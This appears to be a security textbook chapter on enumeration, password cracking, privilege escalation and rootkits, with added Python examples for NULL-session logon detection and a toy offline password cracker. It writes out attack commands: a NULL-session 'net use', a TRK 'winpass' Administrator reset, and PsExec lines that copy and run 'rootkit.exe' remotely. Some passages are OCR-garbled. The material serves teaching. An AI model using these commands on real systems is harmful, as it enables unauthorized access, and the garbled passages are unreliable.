Enumeration

Once port scanning has been performed, it is time to dig deeper into the target system
itself to determine what specifically is available. Enumeration represents a more
aggressive step in the hacking and penetration testing process because the attacker has
now started to access the system to see specifically what is available. All the steps leading
up to this point have been aimed at gaining information about the target to discover
the vulnerabilities that exist and how the network is configured. When enumeration
is performed, the process is now attempting to discover what is offered by these services
for later usage in actual system hacking.

NOTE

In reality, any service can be a
potential target; it all depends
on the knowledge and skill of
the attacker. However, some
services are much more likely
to be attacked than others,
and NetBIOS fits the profile
of a service that is commonly
selected for attack.

Is it Legal?

A case can be made that enumeration represents the point at which hacking really starts,
because the target is now being actively accessed. The steps leading up to enumeration
have different levels of interaction with the target, but none of them seeks to actively
extract information from the target as enumeration does. Enumeration has gone beyond
actively probing a target to see what operating system it may be running to determining
specific configuration details.

Enumeration can be said to be the point where the line has been crossed, with the
activities from this point on becoming illegal.

When performing enumeration, the attacker has the goal of uncovering specific
information about the system itself. During a typical enumeration process an attacker
will make active connections to the target system to discover items such as user accounts,
share names, groups, and other information that may be available via the services
discovered previously. It is not uncommon during this phase of the attack to confirm
information that was discovered earlier, information that the intended target may have
even made publicly available such as Domain Name System (DNS) settings. During
this process, however, new details will emerge that the victim did not make available.
Other details that tend to appear at this point include the following:

• User accounts

• Group settings

• Group membership

• Application settings

• Service banners

• Audit settings

• Other service settings

NULL Session

The NULL session is a feature in the Windows operating system that is used to give
access to certain types of information across the network. NULL sessions are a feature
that has been a part of Windows for some time — one that is used to gain access to parts
of the system in ways which are both useful and insecure.

In addition to determining what services and settings are present,
the enumeration phase also can employ techniques used to
determine the placement and capabilities of countermeasures.
An attacker can use enumeration methods to get a picture of
whether or how a target can respond to system hacking activities.
Uncovering information on whether or how a defender can
respond allows the attacker to modify the attack accordingly
to make the activity more productive.

attacker can gather, the more
accurate the attack can be.
With enough information
about a target, an attacker can
move from a "shotgun" style
attack to an attack similar to
what a sniper would carry out.

A NULL session occurs when a user attempts a connection to a Windows system
without the standard user name and password being provided. This connection type
cannot be made to any Windows share, but it can be made to a feature known as
the Interprocess Communication (IPC) administrative share. In normal practice,
NULL sessions are designed to facilitate connection between systems on a network to
allow one system to enumerate the processes and shares on another. Using a NULL session
it is possible to obtain information such as the following:

• List of users and groups

• List of machines

• List of shares

• Users and host SIDs

The NULL session allows access to a system using a special account known as a NULL
user that can be used to reveal information about system shares or user accounts while
not requiring a username or password to do so.
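An added example serving both the SID section above and this NULL session discussion (not code from the book): it parses SID strings into their parts, names the well-known SIDs and RIDs a defender cares about (S-1-5-7 is ANONYMOUS LOGON, and RID 500 stays the built-in Administrator no matter what the account is renamed to), and flags successful anonymous network logons in a constructed set of records shaped like Windows Security event 4624. The event records and account SIDs are constructed, not real captures.

```python
"""SID parsing and NULL-session logon detection.

Added example, not from the book. SAMPLE_EVENTS is constructed to resemble
the fields of Windows Security event 4624 (successful logon) and 4625
(failed logon); it is not real log data.
"""
from typing import NamedTuple


class Sid(NamedTuple):
    revision: int
    authority: int
    subauthorities: tuple
    rid: int  # last sub-authority: the relative identifier


def parse_sid(text):
    """Split 'S-1-5-21-...-500' into numeric parts; raise ValueError if malformed."""
    parts = text.split("-")
    if len(parts) < 4 or parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: %r" % text)
    nums = [int(p) for p in parts[2:]]  # ValueError if any part is not numeric
    return Sid(1, nums[0], tuple(nums[1:]), nums[-1])


# Well-known SIDs (fixed values defined by Windows).
WELL_KNOWN = {
    "S-1-5-7": "ANONYMOUS LOGON",
    "S-1-5-18": "SYSTEM",
    "S-1-5-19": "LOCAL SERVICE",
    "S-1-5-20": "NETWORK SERVICE",
}


def describe(sid_text):
    """Classify a SID: well-known identity, BUILTIN group, or a domain/machine
    account, where the RID (not the name) identifies the account."""
    sid = parse_sid(sid_text)
    if sid_text in WELL_KNOWN:
        return WELL_KNOWN[sid_text]
    if sid.authority == 5 and sid.subauthorities[0] == 32:
        return "built-in local group (BUILTIN)"
    if sid.authority == 5 and sid.subauthorities[0] == 21 and len(sid.subauthorities) == 5:
        # S-1-5-21-<three domain/machine values>-<RID>
        if sid.rid == 500:
            return "built-in Administrator (RID 500, whatever its current name)"
        if sid.rid == 501:
            return "built-in Guest (RID 501)"
        if sid.rid >= 1000:
            return "user or group created on this system/domain"
    return "other"


def find_null_session_logons(events):
    """Return the records that look like NULL sessions: a successful network
    logon (event 4624, logon type 3) by the ANONYMOUS LOGON SID."""
    return [
        ev for ev in events
        if ev["event_id"] == 4624 and ev["logon_type"] == 3 and ev["sid"] == "S-1-5-7"
    ]


MACHINE = "S-1-5-21-1234567890-987654321-111111111"  # constructed machine SID

SAMPLE_EVENTS = [  # constructed, not real log data
    {"event_id": 4624, "logon_type": 3, "account": "ANONYMOUS LOGON",
     "sid": "S-1-5-7", "source_ip": "192.0.2.10"},
    {"event_id": 4624, "logon_type": 2, "account": "alice",
     "sid": MACHINE + "-1001", "source_ip": "127.0.0.1"},
    {"event_id": 4624, "logon_type": 3, "account": "helpdesk",
     "sid": MACHINE + "-500", "source_ip": "192.0.2.11"},  # renamed Administrator
    {"event_id": 4625, "logon_type": 3, "account": "ANONYMOUS LOGON",
     "sid": "S-1-5-7", "source_ip": "192.0.2.12"},  # failed, not a session
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["account"], "->", describe(ev["sid"]))
    for ev in find_null_session_logons(SAMPLE_EVENTS):
        print("NULL session from", ev["source_ip"])
```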

Exploiting a NULL session is a simple task that requires only a short list of commands.
For example, assume that a computer has the name "ninja" as the host name, which
would mean that the system could be attached to using the following, where host is
the Internet Protocol (IP) address or name of the system being targeted:

net use \ninja\ipc$M ” /user:”” To view the shared folders on the system the following command can be used: Net view Wninja If shared resources are available, they will be displayed as a list, at which point the attacker can attach to a shared resource as follows: Net use s: \ninja(shaied folder name) At this point, the attacker can browse the contents of the shared folder and see what data is present. f > NOTE NULL sessions may sound like a bad idea, but they are very handy when used properly. In practice, the Windows operating system has given broad powers to this account that are not needed to use the account for its intended function. As a security professional, being vigilant about how the sessions are used will help in securing them. Oversharing? Remember that on the Windows operating system shared folders give access to the Everyone group by default. If the Everyone group is given default access to a folder and this is not changed, it creates a situation in which attackers can easily browse the contents of the folder because they will be part of the Everyone group by default. Prior to Windows 2003, the Everyone group was granted full controls of a folder. From Windows 2003 on, the Everyone group is given read-only access, in either situation, it is possible for an attacker to at least view the contents of a folder, and in the case of full control, do much worse. CHAPTER? Enurne ration a nd Computer System Hacking 167 TABLE 7-2 Partial list of nbtstat switches. 
SWITCH NAME FUNCTION ■-a R”p1″i irnQ thp Mp^RIO – ^ n pi rn p i – zi h 1 p zinrl m Anrl Alrirv P.CLU 1 1 l_> L 1 1 C 1 1 tT ID 1 K_|T J I lal lit L EJ U I EI Ol IU 1 1 1 a 1 lUaLUI y access control (IVtAC) address of the address card for the computer name specified -A Adapter Status Lists the same information as -a when given the target’s IP address -c Cache Lists the contents of the NetBIOS name cache -n 1 * u 1 1 1 ET j rii^nl^w^ thp n.amp^ rpn i^tp tp H lor^illv Kv Mp+ R] n^I 1 J lay j Lf ICT 1 lu 1 1 1 CT j 1 UUIjiCI CU IULGIIV UV HC LLJI S_/ J applications such as the server and redirector _r I H o ck -1 ! Eva H Plicnlrnjc 3 f~r\i y n+ ^nt 1 1 n_rrri*>c–c rijcn K i – c< H l~iu L> 1 j jk^lcJy j a LUU.I1 L Ul all rldlfltri [trat/iVCLJ L/y broadcast or Windows Internet Name Service (WINS) server -s Sessions Lists the NetBIOS sessions table converting desti- nation IP addresses to computer NetBIOS names -S Sessions Lists the current NetBIOS sessions and their status, with the IP address t ra n Working with Nbtstat An additional tool that can be used in the enumeration process is a tool known as nbtstat. Included with every version of the Windows operating system, nbtstat is a utility intended to assist in network troubleshooting and maintenance. The utility is specifically designed to troubleshoot name resolution issues that are a result of the NetBIOS service. During normal operation, a service in Windows known as NetEIO L S over TCP/IP will resolve names known as NetBIOS names to IP addresses. Nbtstat is a command line utility designed to locate problems with this service, Nbtstat has a number of switches that can be used to perform different functions; some of the more useful functions for the ethical hacker are listed in Table 7-2. The -A switch can be used to return a list of addresses and NetBIOS mimes ihe system has resolved. 
The command tine that uses this option would look like the following if the targeted system had an IP address of 192, 16 8,1, 1; nbtstat -A 192. 1GS. 1 . 1 SuperScan SuperScan is a tool that was used back in Chapter h to perform port scanning, but can also perform enumeration. On Lop ol SuperSeaji’s previously mentioned a Minks to scan TCP and 1 1 DP ports h perform ping scans, run whois and tracert it also has a formidable suite of features designed to query a system and return useful information. 1 68 PART 2 A Technical Overview of Hacking IP FIGURE 7-t SuperS can. SuperSenn offers a number oJ useful enumeration ul ilit ies dusiLUU’d lor eunu’lmii information from a Windows-based host: • NetBiOS Name Table • MILL session • MAC addresses • Workstation type • Users • Groups • Remote procedure call I RFC) endpoint dump • Account policies • Shares • Domains • Logon sessions • Trusted domains • Services • Each of these features can extract information from a system that can he useful in later stages of the hacking process, CHAPTER7 En time ration and C omputer System Hacking 169 SIMScan SNScan is a utility designed to deled Simple Network Management Protocol (SNMP)- e nab led devices on a network. The utility is designed to locate and identify devices that are vulnerable to SNMP attacks. SNScan scans specific ports (for example. IJDP 161, 193. 391. and 199 3) and looks for the use of standard (public and private) and user-defined SNMP community names. User-defined community names may be used to more effectively evaluate the presence of SNMP- enabled devices in more complex networks. Enumeration is designed to gather useful information about a system: specifically what can be accessed through a discovered service. 
By using the process of enumeration, an attacker can obtain information that may not otherwise be available such as user names, share names, and other details, Enumeration represents the point at which the attack crosses the legal line to being an illegal activity in some areas. System Hacking After an attacker has performed enumeration, he or she can begin attacking the system. Enumeration has provided details that are actionable for the next phase of system hacking, including details of user accounts and groups. The information on usernames and groups provides points on the target system on which to concentrate the system hacking activities. Up to this point, progressively more detailed information has been gathered and what those services are offering has been determined: now the process of exploiting what has been uncovered can begin. During the enumeration phase, among the detailed information that was acquired was usernames. The information on user accounts provides the system hacking process a point to focus on using a technique known as password cracking. Password cracking is used to obtain the credentials of an account with the intent of using the information to gain access to the system as an authorized user. To understand why password cracking is successful, think of how and why passwords are used. Passwords are designed to be something that an individual can easily remember and at the same time not be something easily guessed. Herein lies the problem. In practice, individuals wilt tend to use passwords that are easy to guess or susceptible to cracking methods such as those introduced in this section. 
Some examples of passwords that lend themselves to cracking include the following:
• Passwords that use only numbers
• Passwords that use only letters
• Passwords that are only uppercase or only lowercase
• Passwords that use proper names
• Passwords that use dictionary words
• Short passwords (fewer than eight characters)

Passwords that adhere closely to any of the points on this list lend themselves to quick and easy password cracking methods. Passwords that avoid all of these points tend to be harder to crack, but not impossible, as the techniques discussed in this section will demonstrate.

Types of Password Cracking

Despite what is seen in movies, TV shows, and other media, password cracking isn't as simple as a hacker sitting in front of a computer running some software and breaking the password. It is much more involved. Password cracking can take one of four forms, all designed to obtain a password that the attacker is not authorized to possess. The following are the four password cracking methods that can be utilized by an attacker:
• Passive online attacks
• Active online attacks
• Offline attacks
• Nontechnical attacks

Each one of these attacks offers a way of obtaining a password from an unsuspecting party in a different but effective way.

Passive Online Attacks

In passive online attacks, an attacker obtains a password simply by listening for it. This attack can be carried out using two methods: packet sniffing, or man-in-the-middle and replay attacks. These types of attacks are successful if the attacker is willing to be patient and employ the right technique in the correct environment. Using a packet sniffer is effective, but it can be thwarted by technology that prevents the observation of network traffic. Specifically, purely passive packet sniffing will work only if the hosts are on the same collision domain.
This is the situation when a hub is used to join the network hosts together. If a switch, bridge, or similar device is used, each host sees only the traffic addressed to it, so passive sniffing alone fails; the attacker must then fall back on an active technique such as ARP spoofing to pull the traffic through the sniffing host, which is no longer silent.

Other types of passive online attacks utilize a man-in-the-middle or replay attack to capture the password of the target. If a man-in-the-middle attack is used, the attacker must capture traffic from both ends of the communication between two hosts with the intention of capturing and altering the traffic in transit. In a replay attack, an attacker captures traffic using a sniffer, uses some process to extract the desired information (in this case, the password), and then uses or replays it later to gain access to a resource.

While a packet sniffer may have limited success when trying to capture passwords on most networks, companies do tend to frown upon their use by unauthorized individuals. An individual who runs a packet sniffer on a corporate network has a possibility of capturing a password, not to mention other confidential information. It is for these reasons that companies tend to take a very tough stance on their usage, and in some cases have terminated the employment of individuals caught using them on the network without permission.

NOTE: Dictionary attacks are successful when users are allowed to choose passwords without any restrictions being placed upon them. Evidence has shown that individuals will choose passwords that are common names or words if allowed to do so, and it is in these cases that dictionary attacks thrive. The enforcement of complex passwords that introduce upper- and lowercase letters as well as numbers and special characters tends to limit the success of dictionary attacks.
Active Online Attacks

The next form of attack is known as an active online attack, which consists of more aggressive methods such as brute-force and dictionary attacks submitted directly to the target's logon. Active online attacks are effective in situations in which the target system has weak or poorly chosen passwords in use. In such cases, active online attacks can crack passwords very quickly.

The first type of active online attack is the brute-force attack, which is unsophisticated but can be very effective in the right situation. In this type of attack, all possible combinations of characters are tried until the correct combination is discovered. Given enough time, this type of attack will be successful 100 percent of the time; however, that is also part of the problem: having enough time.

A dictionary attack shares some traits with the brute-force attack. Whereas a brute-force attack attempts all combinations of characters, the dictionary attack tries passwords that are pulled from a predefined list of words. Dictionary attacks are particularly successful in situations in which the passwords in use on a system have been chosen, or can be chosen, from common words. This type of attack is successful even if the password is a reversed form of a dictionary word, changes certain characters, or uses tactics such as appending digits to the end of the word, because the word list can be expanded with those variations. These types of attacks are easy for an attacker to carry out, largely due to the availability of the components to perform them, such as password crackers and predefined word lists that can be downloaded and used immediately.

Offline Attacks

Offline attacks are a form of password attack that relies on weaknesses in how passwords are stored on a system. The previous attack types attempted to gain access to a password by capturing it or trying to break it directly; offline attacks go after passwords where they happen to be stored on a system.
On most systems, a list of usernames and passwords is stored in some location; if these lists are stored in a plaintext or unencrypted format, an attacker can read the file and gain the credentials. If the list is encrypted or protected, the question becomes "How is it protected?" If the list is using weak encryption or hashing methods, it can still be vulnerable.

NOTE: Brute-force attacks, although effective, are thwarted by preventive techniques such as policies that lock user accounts when a password is entered incorrectly a preset number of times. When policies are in effect that limit unsuccessful logon attempts before locking an account, the effectiveness of an online brute-force attack is diminished. Such policies do nothing against offline attacks, which never touch the logon.

A Look at Password Hashing

Passwords used to grant access to a system are generally stored in a database on the system, where they can be accessed to validate the identity of a user. By its very nature, such a database can store quite a number of passwords, each granting some sort of access to the system, so the confidentiality and integrity of these items must be preserved. Two ways to protect these valuable credentials are encryption and hashing. Encryption provides a barrier against unauthorized disclosure, while hashing lets the system verify a password without storing the password itself: only a one-way digest of it is kept.

When users attempt to log on to the system, they provide their credentials in the form of a user name and password, and the password is hashed. Because the database on the system already has a hashed form of the user's password on file, a comparison is made. If what the user provides matches what is on file, the user is authenticated; if not, access is denied. While the hashing method is known to both parties and can be discovered with some work by an attacker, it does not tell the attacker what a password is, because he or she would still have to reverse the hash (which is designed to be infeasible).
However, the attacker can apply the same hashing function to different character combinations in an attempt to produce an identical hash. The rate at which this can be done varies depending largely on the hashing function used, but in some cases the process can be performed quite rapidly, which allows the plaintext password to be recovered easily. The attacks discussed in this section rely on this property to recover passwords.

Four types of offline attacks are available to the attacker, each offering a method that can be used to obtain passwords from a target system. The types of offline attacks include the two mentioned previously (dictionary and brute-force attacks), and also hybrid and precomputed attacks. Examples of password crackers in this category include:
• Cain and Abel: has the ability to crack password hashes offline. Works with Windows, Cisco, VNC, and other similar passwords.
• John the Ripper: cracks UNIX and Windows passwords.
• Pandora: designed to crack Novell passwords.
• Pwdump3: extracts password hashes from the SAM database.

Dictionary Attacks

Offline dictionary attacks are similar to the active online version in that candidate passwords from a word list are tried one after another until the correct one is discovered. The difference is how the correct one is uncovered. In this method, the attacker hashes each word and reads the list of captured hashes looking for hashes that match the hashed values of words in the dictionary. If the attacker finds a match between a hashed value from the system and a hashed value from the dictionary or word list, he or she has found the correct password.

NOTE: A method of thwarting hash attacks that is used by many systems, such as UNIX, is a technique known as salting. When salting is used, extra characters (the salt) are added to a password prior to hashing. This has the effect of changing the hash, but not the password. Because the same password produces a different hash under every salt, attackers who recover the list of hashes from the system have a much harder time recovering the passwords: they must redo the hashing for each account's salt, and a table of hashes computed ahead of time without the salt is useless.

Hybrid Attacks

Hybrid attacks are another form of offline attack that functions much like dictionary attacks, but with an extra level of sophistication. Hybrid attacks start out like a dictionary attack, in which the words from the dictionary are attempted; if this is unsuccessful at uncovering the password, the process changes. In the next phase of the attack, characters and symbols are added to, substituted into, or appended to the dictionary words to attempt to reveal the password. The attack is designed to be fast and to catch users who merely decorate a dictionary word with digits or symbols to satisfy a complexity rule.

Brute-Force Attacks

Offline brute-force attacks function like their online counterparts in that they attempt all possible combinations, or a suspected subset of possible passwords, but against the captured hashes rather than the live logon. Brute force has the benefit of always working, but the downside is that it takes a long time. Typically, this method starts with simple combinations of characters and then increases complexity until the password is revealed. Examples of brute-force password crackers include:
• Ophcrack
• Proactive Password Auditor

Given enough time (possibly years), brute-force attacks will succeed, but the issue becomes whether the attackers have enough time before they are detected. Brute-force methods of any type can take substantial periods of time, depending on the complexity of the password, its length, and the processing power of the system attempting the break-in. Attackers run the risk that if they take too long to break a password, they will be detected by the system owner, at which point the attack will have failed.

Precomputed Hashes

Precomputed hashes are used in an attack type known as a rainbow table.
Rainbow tables compute every possible combination of characters, together with its hash, prior to capturing a password. Once all the hashes have been generated, the attacker can capture a password hash from the network or the target system and compare it with the hashes that have already been generated. With all the hashes generated ahead of time, it becomes a simple matter to compare the captured hash to the ones generated, typically revealing the password within a few moments.

Of course, there's no getting something for nothing, and the case of rainbow tables is no exception. The downside of rainbow tables is that they take time: it takes a substantial period of time, sometimes days, to compute all the hash combinations ahead of time, and the result is a trade of storage space for cracking time. Another downside of rainbow tables is the inability to crack passwords of unlimited length, because generating passwords of increasing length takes increasing amounts of time and storage. Examples of password crackers that use rainbow tables include:
• Ophcrack
• RainbowCrack

Nontechnical Attacks

The last of the password cracking methods is a family of techniques that obtain passwords using nontechnical methods. In some cases, an attacker may choose nontechnical methods due to conditions in the environment or just because it is easier. The nontechnical methods represent a change from the previous attacks: where the previous attacks went after the technology, nontechnical methods go after the human who uses the system. In the right hands, nontechnical methods can be as effective as technical methods at obtaining passwords.

Shoulder Surfing

Shoulder surfing is a method of obtaining a password by observing people entering their password. In this attack, the individual wanting to gain access to the password takes a position to see what a user is typing or what is appearing onscreen. Additionally, the attacker may look for clues in the user's movements that suggest they are looking up a password, such as on a Post-It note or in another location.
To deter this attack, use a privacy screen on the display and always pay attention to your surroundings to see whether anyone is watching.

NOTE: Rainbow tables are an effective method of revealing passwords, but the effectiveness of the method can be diminished through salting. Salting is used in Linux, UNIX, and BSD, but it is not used in some of the older Windows authentication mechanisms such as LM and NTLM.

Keyboard Sniffing

Keyboard sniffing intercepts the password as a user is entering it. This attack can be carried out when users are the victims of keylogging software or if they regularly log onto systems remotely without using any protection.

Social Engineering

Social engineering methods can be used to obtain a password based on trust or ignorance on the user's end. For example, a password may be obtained by an attacker calling an individual, pretending to be the system administrator, and asking for the password. Social engineering is effective because users tend to be trusting: if an individual sounds or acts legitimate, the feeling is that he or she probably is.

Using Password Cracking

Using any of the methods discussed here with any type of password cracking software may sound easy, but there is one item to consider: whose password to crack? Going back to the enumeration phase, it was discussed that usernames could be extracted from the system using any one of a number of software packages or methods. Using these tools, usernames were uncovered, and at this point the attacker can target a specific account with the password cracking tool of choice. So which password to crack? Accounts such as the administrator account are targets of opportunity, but so are lower-level accounts such as guest, which may not be as heavily defended, nor even considered in security planning.
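To make the offline attacks above concrete, here is an added example that is not from the book or from any of the crackers it names. It works through dictionary, hybrid, and precomputed-table cracking against a constructed hash dump, then shows why the salting described in the notes defeats the precomputed table. Unsalted SHA-1 stands in for an unsalted scheme such as NTLM; the usernames, passwords, word list, mangling rules, and salt are all assumptions.

```python
import hashlib

# Constructed word list (a real attack uses a downloaded list of millions of words).
WORDLIST = ["password", "summer", "dragon", "letmein", "welcome", "monkey"]

def unsalted_hash(password):
    """Stand-in for an unsalted hash such as NTLM: same password, same digest, on every system."""
    return hashlib.sha1(password.encode()).hexdigest()

def salted_hash(password, salt):
    """Salted variant: the salt is stored beside the hash and mixed in before hashing."""
    return hashlib.sha1((salt + password).encode()).hexdigest()

# Constructed dump in the shape a pwdump-style tool produces: username -> stored hash.
DUMP = {
    "alice": unsalted_hash("summer"),        # plain dictionary word
    "bob":   unsalted_hash("Dragon42"),      # dictionary word, capitalized, digits appended
    "carol": unsalted_hash("Xk9$vQ2!pL"),    # random; none of the attacks below should recover it
}

def dictionary_attack(target, wordlist):
    """Hash each word as-is and compare with the captured hash."""
    for word in wordlist:
        if unsalted_hash(word) == target:
            return word
    return None

def hybrid_candidates(word):
    """Mangling rules a hybrid attack applies to every dictionary word."""
    leet = word.translate(str.maketrans("aeos", "@30$"))
    for base in (word, word.capitalize(), word[::-1], leet):
        yield base
        for n in range(100):                 # appended digits 0..99
            yield "%s%d" % (base, n)

def hybrid_attack(target, wordlist):
    for word in wordlist:
        for candidate in hybrid_candidates(word):
            if unsalted_hash(candidate) == target:
                return candidate
    return None

def build_table(wordlist):
    """Precompute hash -> plaintext once. A rainbow table stores this far more compactly
    with hash chains, but the idea is the same: all hashing happens before any capture."""
    return {unsalted_hash(c): c for w in wordlist for c in hybrid_candidates(w)}

def table_lookup(table, target):
    return table.get(target)

def crack_salted(target, salt, wordlist):
    """With a salt the attacker must redo the hashing per account; no prebuilt table applies."""
    for word in wordlist:
        for candidate in hybrid_candidates(word):
            if salted_hash(candidate, salt) == target:
                return candidate
    return None

def crack_dump(dump, wordlist):
    """Cheapest method first; returns username -> (method, password) for what was recovered."""
    table = build_table(wordlist)
    methods = (("dictionary", lambda h: dictionary_attack(h, wordlist)),
               ("precomputed", lambda h: table_lookup(table, h)),
               ("hybrid", lambda h: hybrid_attack(h, wordlist)))
    results = {}
    for user, stored in dump.items():
        for name, attack in methods:
            found = attack(stored)
            if found is not None:
                results[user] = (name, found)
                break
    return results

if __name__ == "__main__":
    for user, (method, password) in crack_dump(DUMP, WORDLIST).items():
        print("%-6s %-12s %s" % (user, method, password))
    salt = "a1b2"                            # assumed per-account salt
    print("salted hash in prebuilt table:", table_lookup(build_table(WORDLIST), salted_hash("summer", salt)))
    print("salted hash, redoing the work:", crack_salted(salted_hash("summer", salt), salt, WORDLIST))
```

The dump shows the progression the text describes: alice falls to the plain word list, bob only once mangling rules are applied, and carol not at all. The last two lines are the point of the salting note: the table built ahead of time contains no entry for the salted hash, and recovering it means repeating the whole candidate loop for that one salt.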
Privilege Escalation

If a password is cracked, the probability of the account being one that has high-level access is somewhat low, because these types of accounts tend to be well defended. If a lower-level account is cracked, the next step is privilege escalation: to escalate the privileges to a level at which increased access and fewer restrictions are in place, such as with the administrator account.

Out of Sight, Out of Mind

Every operating system ships with a number of user accounts and groups already present. In Windows, users who are already configured include the administrator and guest accounts. Because it is easy for an attacker to find information on the accounts that are included with an operating system, care should be taken to ensure that such accounts are secured properly, even if they will never be used. An attacker who knows that these accounts exist on a system is more than likely to try to obtain the passwords of each.

Stopping Privilege Escalation

A number of methods can be used to blunt the impact of privilege escalation, such as the concept known as least privilege. The thinking behind this concept is to limit the amount of access an account has to just what is needed to perform its assigned duties. For example, a user account given to someone in sales would be able to perform only the tasks required by a salesperson to do the job. In this way, the actions that an account can perform are limited, preventing inadvertent or accidental damage or access to resources.

One way to escalate privileges is to identify an account that has the access desired and then change its password. Several tools offer this ability, including the following:
• Active@ Password Changer
• Trinity Rescue Kit
• ERD Commander
• Recovery Console

These utilities function by altering the SAM with the goal of resetting passwords and accounts to settings desired by the attacker.
Active@ Password Changer

The Active@ Password Changer is a utility that is used to perform multiple functions on user accounts, including password resets. The utility can be used to change the password of a targeted user account to a password that the attacker chooses. To use this utility, the attacker must gain physical access to a system, at which point the system can be rebooted from a universal serial bus (USB) drive, floppy, or CD. The designers of Active@ designed it to avoid the lengthy process of reinstalling an operating system when a password reset could be performed instead. However, as is the case with any tool, it can be used for good or bad; it all depends on the user's intent. Active@ has the advantage of being able not only to reset passwords, but also to:
• Re-enable accounts
• Unlock an account
• Reset expiration on an account
• Display all local users on a system
• Reset administrator account credentials

To change a password using Active@, select a specific user account to view the account information, as seen in Figure 7-2. To view and change permitted logon days and hours, press the [PgDn] key, as seen in Figure 7-3.

FIGURE 7-2 Viewing account information. (Active@ Password Changer screen for one account: the SAM database path, full name and description, and the flags "User must change password at next logon", "Password never expires", "Account is disabled", "Account is locked out", and "Clear this User's Password".)

Select and choose days and hours to allow logons. Account logon hours are displayed in GMT (Greenwich Mean Time). The time will have to be adjusted for the local time zone where the system resides or for the time zone set on the system. Press [Y] to save changes, or press [Esc] to leave the previous account information unchanged and return to the previous window (the list of accounts). See Figure 7-4. Resetting a user's password results in the following:
• The user's password is set to blank.
• The account is enabled.
• The password is set never to expire.

FIGURE 7-3 Changing logon days and times. (Active@ Password Changer grid of permitted logon hours, in GMT, for each day of the week.)
FIGURE 7-4 List of accounts. (Active@ Password Changer reporting that the user's attributes have been successfully changed.)

Trinity Rescue Kit

Trinity Rescue Kit (TRK) is a Linux distribution that is specifically designed to be run from a CD or flash drive. TRK was designed to recover and repair both Windows and Linux systems that were otherwise unbootable or unrecoverable. While TRK was designed for benevolent purposes, it can easily be used to escalate privileges by resetting the passwords of accounts that you would not otherwise have access to. TRK can be used to change a password by booting the target system from a CD or flash drive and entering the TRK environment. Once in the environment, a simple sequence of commands can be executed to reset the password of an account. The following steps change the password of the Administrator account on a Windows system using TRK:

1. At the command line, enter the following command:
winpass -u Administrator
The winpass command will then display a message similar to the following:
Searching and mounting all file system on local machine
Windows NT/2K/XP installation(s) found in:
1: /hda1/Windows
Make your choice or 'q' to quit [1]:
2. Type 1, or the number of the location of the Windows folder if more than one install exists, and press Enter.
3. Enter the new password or accept TRK's suggestion to set the password to blank.
4. You will see the message "Do you really wish to change it?" Enter Y and press Enter.
5. Type init 0 to shut down the TRK Linux system.
6. Reboot.

NOTE: TRK can be used as a follow-on tool to the enumeration techniques discussed earlier. It works best when you know the name of the account to be changed. The enumeration techniques shown previously allow you to browse the accounts on a system and select a target account.

As you can see, it is possible to change the password of a specific account using TRK in a few steps. Escalating privileges gives the attacker the ability to perform actions on the system with fewer restrictions and to perform tasks that are potentially more damaging. If an attacker gains higher privileges than he or she would otherwise have, it is possible to run applications, perform certain operations, and engage in other actions that have a bigger impact on the system.

Planting Backdoors

The next step after escalating privileges is to place backdoors on the system so you can come back later and take control of the system repeatedly. An attacker who places a backdoor on a system can use it for all sorts of reasons, depending on specific goals. Some of the reasons for planting backdoors include the following:
• Placing a rootkit
• Executing a Trojan

Of course, the question is how to get a backdoor onto a system. With the escalated privileges obtained earlier, you have the power to run an application on a system, and to do so more freely than you would without such privileges. If the privileges obtained previously were administrator (or equivalent), you now have few if any limitations, which means that you can install a backdoor quite easily. To start the process, you must first run an application remotely. Several tools are available, but for this discussion you will use some of the components of a suite of tools known as PsTools.

FYI: PsTools is a suite of tools designed by Mark Russinovich of Microsoft. The PsTools suite was originally designed for Windows NT systems, but it has continued to serve a useful purpose in later versions.
PsTools contains applications designed to do everything from running commands remotely to terminating processes, as well as a number of other functions. All the applications that make up the PsTools suite are command line-based and can be customized through the use of switches.

Using PsTools

The PsTools suite includes a mixed bag of utilities designed to ease system administration. Among these tools is PsExec, which is designed to run commands interactively or noninteractively on a remote system. Initially, the tool may seem similar to Telnet or Remote Desktop, but it does not require installation on the local or remote system in order to work. PsExec need only be copied to a folder on the local system and run with the appropriate switches. Behind the scenes it does copy a small service executable, PSEXESVC, to the target's ADMIN$ share and start it for the duration of the session, so it needs credentials with administrative rights on the remote system and leaves a service-installation record in the target's System event log. Let's take a look at some of the commands that can be used with PsExec:
• The following command launches an interactive command prompt on a system named zelda:
psexec \\zelda cmd
• This command executes ipconfig on the remote system with the /all switch and displays the resulting output locally:
psexec \\zelda ipconfig /all
• This command copies the program rootkit.exe to the remote system and executes it interactively:
psexec \\zelda -c rootkit.exe
• This command copies the program rootkit.exe to the remote system and executes it interactively using the administrator account on the remote system:
psexec \\zelda -u administrator -c rootkit.exe

As these commands illustrate, it is possible for an attacker who holds administrative credentials to run an application on a remote system quite easily. The next step is for the attacker to decide just what to do or what to run on the remote system. Some of the common choices are Trojans, rootkits, or backdoors.

Rootkits

A rootkit is a piece of software designed to perform some very powerful and unique tasks on a target system.
This software is designed to alter system files and utilities on a victim's system with the intention of changing the way the system behaves. Additionally, a rootkit quite commonly has the capability to hide itself from detection, which makes it quite dangerous. A rootkit is beneficial to an attacker for a number of reasons, but the biggest benefit is the scope of access the attacker can gain. With a rootkit installed on a system, attackers gain root access to the system, which means that they now have the highest level of access possible on the target. Once attackers have a rootkit installed, they effectively own the system and can get it to do whatever they want. In fact, a rootkit can be embedded into a system so deeply and with such high levels of access that even the system administrator will be unable to detect its presence. Having root access to a system allows an attacker to do any of the following:

Sony's Rootkit Problem

One of the more famous rootkits was produced by Sony BMG in 2005 as a way to enforce Digital Rights Management (DRM) on its music. The software was shipped on the CDs of some of Sony's popular artists. When the CD was placed into a computer running Microsoft Windows, the software would install on the system and prevent copying of the music. The biggest downside to this software was that its cloaking had no protection: it hid any file or process whose name began with $sys$, so an attacker who knew the software was present, or knew how to scan for it, could use it to hide malware on a victim's system. This rootkit case had a lot of fallout for Sony and the computing public at large. Sony was embarrassed by the publicity and ultimately was on the losing side of a class action lawsuit. Additionally, as a result of this problem, the public became aware of the threat of rootkits and learned to be more cautious.
Sony's rootkit episode also attracted hackers to write new worms designed to pounce on the vulnerabilities that the rootkit introduced on a system.

• Installing a virus at any point: if the virus requires root-level access to modify system files, or to alter and corrupt data or files, a rootkit can provide the means to do so.
• Placing a Trojan on a system: much like viruses, a Trojan may require root-level access, so a rootkit will provide the level of access needed to run these types of malware.
